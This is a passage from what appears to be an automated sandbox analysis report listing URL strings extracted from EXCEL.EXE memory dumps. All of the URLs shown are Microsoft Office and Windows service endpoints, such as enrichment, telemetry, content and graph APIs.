      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comW_
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comed
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://directory.services.
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v14
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1AuthorizationBearer
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1(BEnrichmentWACUrlhttps://enrichment.os
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/Yx
      Source: EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/zx5q
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674412256.000000000F1BB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/dW
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netnt
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comF
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comS
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comm
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965376402.00000000129F4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?&
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: EXCEL.EXE, 00000000.00000003.673790254.0000000012AD3000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674412256.000000000F1BB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1L
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
      Source: EXCEL.EXE, 00000000.00000002.965376402.00000000129F4000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?y
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comP
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/client)
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstore9
      Source: EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674412256.000000000F1BB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
      Source: EXCEL.EXE, 00000000.00000003.673790254.0000000012AD3000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppHomeR
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
